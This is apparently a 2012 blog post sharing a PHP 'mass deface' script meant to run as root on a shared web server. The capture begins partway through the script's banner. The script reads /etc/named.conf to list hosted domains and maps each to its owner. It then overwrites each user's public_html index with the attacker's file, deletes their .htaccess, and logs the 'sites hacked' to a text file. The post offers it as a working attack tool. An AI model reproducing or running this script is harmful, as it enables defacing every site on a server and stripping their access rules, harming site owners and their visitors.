Pages

08 November 2012

Mass defaces root user

       |
# Email      : oy3@hotmail.com                     |
#--------------------------------------------------/


\n");


if(!$argv[1]){

print_r("

-------------------------------------\
USAGE : php mass_sa.php [Your index] |
Ex    : php mass_sa.php index.htm    |
-------------------------------------/

");
die();

}



$d00m = @file("/etc/named.conf");

if(!$d00m)
{
die (" can't read /etc/named.conf");
}
else

{
$f =@fopen ('shack.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);


if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

$site = $user['name'] ;

$file = $argv[1];

$file2 = @file("$file");

$dom3n = $domsws[1][0];

if (empty($file2))
{
  print_r("file $file not here !

  " );
  exit;
}
else {



$copy = @copy("$file","/home/".$user['name']."/public_html/$file");

if ($copy)
{

@system("rm /home/".$user['name']."/public_html/.htaccess");

print_r("$dom3n <-- done \n \n");

@fwrite($f,"$dom3n \n" );

}else
{
 print_r("$dom3n <-- error ! \n \n");



}
}
}
}
}
}



print_r("
\n\n
#--------------------------------------------------\
#            sites hacked in a shack.txt  ^_*      |
#            al-swisre _ oy3@hotmail.com           |
#--------------------------------------------------/


\n");



?>

0 comments: